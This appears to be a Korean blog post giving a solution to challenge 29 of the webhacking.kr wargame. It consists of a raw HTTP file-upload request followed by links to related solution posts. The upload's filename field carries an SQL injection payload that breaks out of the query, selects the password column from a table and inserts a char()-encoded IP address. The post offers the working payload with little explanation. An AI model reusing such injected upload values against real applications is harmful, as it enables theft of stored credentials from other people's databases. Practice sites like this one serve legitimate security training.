POST /challenge/web/web-14/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Content-Length: 262
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webhacking.kr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
HTTPS: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryydVPwrRu4LptA6XI
Referer: http://webhacking.kr/challenge/web/web-14/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=4sm6rmlhvpg6koj4kot9s9uel4
X-dotNet-Beautifier: 3150; DO-NOT-REMOVE
------WebKitFormBoundaryydVPwrRu4LptA6XI
Content-Disposition: form-data; name="upfile"; filename="1.25',(select password from c29_tb),char(49,50,53,46,49,51,49,46,49,56,57,46,54,49))#"
Content-Type: text/html
1
------WebKitFormBoundaryydVPwrRu4LptA6XI--
'Hacking > Webhacking.kr(스포주의)' 카테고리의 다른 글
Webhacking.kr 35 (0) | 2016.01.15 |
---|---|
Webhacking.kr 45 (0) | 2016.01.15 |
blind sql injection (0) | 2016.01.15 |
Webhacking.kr 45 (0) | 2016.01.15 |
Webhacking.kr 30 (0) | 2016.01.15 |